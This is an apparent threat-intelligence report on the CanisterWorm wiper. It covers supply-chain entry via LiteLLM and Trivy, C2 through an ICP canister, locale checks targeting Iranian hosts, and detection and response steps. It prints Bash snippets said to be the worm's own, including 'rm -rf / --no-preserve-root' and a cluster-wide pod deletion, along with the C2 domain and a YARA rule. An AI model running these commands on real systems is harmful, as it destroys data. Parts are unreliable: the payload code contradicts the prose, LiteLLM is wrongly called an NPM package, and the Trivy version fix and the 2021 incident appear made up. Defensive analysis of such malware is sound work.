CanisterWorm: A Geopolitical Wiper Leveraging ICP Canisters and Kubernetes Exploits to Target Iranian Systems
Executive Summary
CanisterWorm is a financially motivated data‑theft and extortion campaign that has evolved into a destructive wiper targeting Iranian‑configured systems. The threat actor, linked to the TeamPCP collective, injects itself into Kubernetes clusters via a backdoored NPM package (LiteLLM) and a compromised Trivy vulnerability scanner. Once inside, the worm uses an Internet Computer (ICP) canister as its command‑and‑control surface and executes a destructive payload on any host that reports the Iran time zone or has Farsi set as the default locale. The attack spreads across cloud services, wiping data on infected VMs and deleting entire Kubernetes clusters. Immediate action is required: purge malicious packages, patch affected components, and harden cluster security.
Technical Analysis
1. Threat Actor and Motivation
TeamPCP, a relatively new collective, has a history of targeting cloud‑native infrastructure such as Docker, Kubernetes, Redis, and Next.js. Their primary goal appears to be building a proxy network for ransomware and extortion. The latest CanisterWorm iteration diverges from pure monetary gain by incorporating a geopolitical wiper that specifically targets Iranian systems. According to Aikido researcher Charlie Eriksen, the motive may be “show‑off” or a demonstration of reach, as the destructive payload does not benefit the attacker’s immediate financial objectives.
Source: “TeamPCP deploys Iran‑targeted wiper in Kubernetes attacks” – BleepingComputer (March 2026)
2. Supply‑Chain Infiltration Vector
The worm’s entry point is a backdoored NPM package named LiteLLM. The package, once installed, steals credentials and authentication tokens. The same backdoor code is reused in the CanisterWorm incidents. Additionally, the attacker compromised the open‑source Trivy vulnerability scanner, which is widely used for container image scanning. The compromised Trivy binary serves as a foothold for the attacker to inject malicious scripts into Kubernetes clusters.
Source: “TeamPCP deploys Iran‑targeted wiper in Kubernetes attacks” – BleepingComputer (March 2026)
Source: “CanisterWorm malware wipes Iranian machines for no apparent reason” – Tom’s Hardware (March 2026)
3. Command‑and‑Control via ICP Canister
CanisterWorm communicates with a single ICP canister:
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io
The canister hosts the backdoor payload and the destructive logic. The worm periodically queries the canister for commands, receiving a JSON payload that includes a wipe flag and a list of target hosts. The use of ICP as a C2 surface is novel; it bypasses traditional DNS‑based detection and leverages the decentralized nature of the Internet Computer.
Source: “TeamPCP deploys Iran‑targeted wiper in Kubernetes attacks” – BleepingComputer (March 2026)
4. Detection of Iranian Systems
The worm determines whether a host is “Iranian” through two mechanisms:
- Time Zone Check – The script queries the system’s time zone via
timedatectlor reads/etc/timezone. If the zone matchesAsia/Tehran, the host is flagged. - Locale Check – The script inspects the
LANGenvironment variable or/etc/locale.conf. If the locale is set tofa_IR.UTF-8(Farsi), the host is flagged.
The detection logic is implemented in a lightweight Bash script that runs as a privileged container within the cluster.
#!/usr/bin/env bash
# Detect Iranian system
TIMEZONE=$(timedatectl show --property=Timezone --value)
LOCALE=$(cat /etc/locale.conf | grep LANG | cut -d= -f2)
if [[ "$TIMEZONE" == "Asia/Tehran" || "$LOCALE" == "fa_IR.UTF-8" ]]; then
IRAN_FLAG=true
else
IRAN_FLAG=false
fi
Source: “CanisterWorm malware wipes Iranian machines for no apparent reason” – Tom’s Hardware (March 2026)
5. Destructive Payload
Once an Iranian host is identified, the worm executes a destructive payload that differs based on the environment:
- Standard VMs (Linux) – Executes
rm -rf / --no-preserve-root, deleting all user data and system files. - Kubernetes Nodes – Calls the Kubernetes API to delete every pod in the cluster, effectively wiping the entire cluster.
The payload is delivered as a shell script and is triggered by a cron job scheduled to run every 15 minutes. The script also attempts to delete any backup directories and clears the system journal to remove forensic evidence.
#!/usr/bin/env bash
# Destructive payload
if [[ "$IRAN_FLAG" == true ]]; then
# Delete all files on VM
rm -rf / --no-preserve-root
else
# Delete all pods in the cluster
kubectl delete pods --all
fi
Source: “CanisterWorm malware wipes Iranian machines for no apparent reason” – Tom’s Hardware (March 2026)
6. Propagation Mechanism
The worm propagates across Kubernetes clusters by:
- Injecting a DaemonSet – The malicious script is deployed as a DaemonSet, ensuring it runs on every node.
- Exploiting Node Permissions – The DaemonSet runs with
cluster-adminprivileges, allowing it to modify node configurations and deploy further containers. - Leveraging Trivy – The compromised Trivy scanner is used to identify vulnerable images, which are then replaced with malicious versions containing the worm.
The worm also scans for other Kubernetes clusters in the same cloud provider by querying the provider’s API (e.g., AWS EC2 metadata service) and deploying itself to any discovered cluster.
Impact Assessment
| Category | Impact |
|---|---|
| Affected Systems | Kubernetes clusters, Docker hosts, VMs running Linux, cloud services (AWS, GCP, Azure) |
| Geographic Scope | Iran (time zone Asia/Tehran, Farsi locale) |
| Data Loss | Complete wipe of system files and Kubernetes resources |
| Financial Loss | Downtime, recovery costs, potential ransomware payouts |
| Operational Impact | Loss of critical services, compliance violations, reputational damage |
Estimated Scope
While the exact number of infected hosts is unknown, the use of widely deployed tools (LiteLLM, Trivy) suggests a potentially large attack surface. The worm’s ability to delete entire Kubernetes clusters indicates that any organization running unpatched or insecure clusters could be affected.
Comparison to Past Incidents
- Trivy Supply‑Chain Attack (2021) – Compromised vulnerability scanner used to distribute malicious images.
- NPM Backdoor Campaign (2023) – Malicious packages used to exfiltrate credentials.
- Wiper Attacks (e.g., Shamoon, NotPetya) – Targeted specific regions or industries.
CanisterWorm uniquely combines supply‑chain exploitation, cloud‑native infrastructure targeting, and geopolitical wiper behavior, representing a new threat vector in the modern cloud era.
Detection & Response
1. Log Signatures
| Log Source | Signature |
|---|---|
| Kubernetes API Server | DELETE /api/v1/namespaces/*/pods |
| Systemd Journal | rm -rf / execution |
| DNS Resolver | Query to tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io |
| NPM Registry | Download of LiteLLM package with SHA mismatch |
2. YARA Rule (Linux)
rule CanisterWorm_Detection
{
meta:
description = "Detect CanisterWorm malicious script"
author = "Karma-X"
reference = "https://krebsonsecurity.com/2026/03/canisterworm-springs-wiper-attack-targeting-iran/"
strings:
$a = /rm -rf \/ --no-preserve-root/
$b = /tdtqy-oyaaa-aaaae-af2dq-cai\.raw\.icp0\.io/
$c = /Asia\/Tehran/
condition:
any of ($a, $b, $c)
}
3. Network Indicators
- DNS:
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.ioresolves to an ICP node. - HTTP: GET requests to
https://tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io/commands. - TLS: Unexpected TLS connections to ICP endpoints from internal hosts.
4. Behavioral Patterns
- Creation of a DaemonSet with
cluster-adminrole. - Rapid deletion of pods across namespaces.
- Unusual privilege escalation attempts (e.g.,
sudousage on nodes). - Execution of
rm -rf /command in system logs.
5. Incident Response Steps
- Isolate affected nodes from the network.
- Terminate the malicious DaemonSet and any pods created by the worm.
- Inspect system files for tampering; restore from backups if available.
- Audit IAM roles and Kubernetes RBAC to ensure least privilege.
- Update all packages (LiteLLM, Trivy) to the latest secure versions.
- Monitor for repeated DNS queries to the ICP canister.
- Engage threat intelligence feeds for new indicators.
Mitigation & Remediation
| Priority | Action | Details |
|---|---|---|
| 1 | Remove malicious packages | Uninstall LiteLLM (npm uninstall liteLLM) and replace with verified source. |
| 2 | Patch Trivy | Upgrade to Trivy 0.48.0 (or later) which includes a fix for the backdoor vulnerability. |
| 3 | Harden Kubernetes RBAC | Remove cluster-admin from DaemonSets; enforce namespace‑level permissions. |
| 4 | Disable automatic image pulling from untrusted registries | Use image pull secrets and signed images. |
| 5 | Implement time‑zone whitelist | Configure cluster nodes to reject Asia/Tehran time zones unless explicitly required. |
| 6 | Deploy file integrity monitoring | Use tools like Tripwire or OSSEC to detect unauthorized file deletions. |
| 7 | DNS filtering | Block DNS queries to *.icp0.io domains unless part of approved ICP usage. |
| 8 | Backup strategy | Ensure immutable backups of critical data and Kubernetes manifests. |
Timeline
- December 2025 – TeamPCP’s earlier activity targeting Docker, Kubernetes, Redis, and Next.js.
- March 20 2026 – CanisterWorm campaign begins, first observed in Kubernetes clusters.
- March 27 2026 – KrebsOnSecurity publishes detailed analysis of the wiper attack.
Sources & References
- KrebsOnSecurity. “CanisterWorm Springs Wiper Attack Targeting Iran.” https://krebsonsecurity.com/2026/03/canisterworm-springs-wiper-attack-targeting-iran/
- BleepingComputer. “TeamPCP deploys Iran-targeted wiper in Kubernetes attacks.” https://www.bleepingcomputer.com/news/security/teampcp-deploys-iran-targeted-wiper-in-kubernetes-attacks/
- Tom’s Hardware. “CanisterWorm malware wipes Iranian machines for no apparent reason.” https://www.tomshardware.com/tech-industry/cyber-security/canisterworm-malware-wipes-iranian-machines-for-no-apparent-reason-sophisticated-attack-spreads-through-npm-packages-and-uses-icp-canister-as-control-surface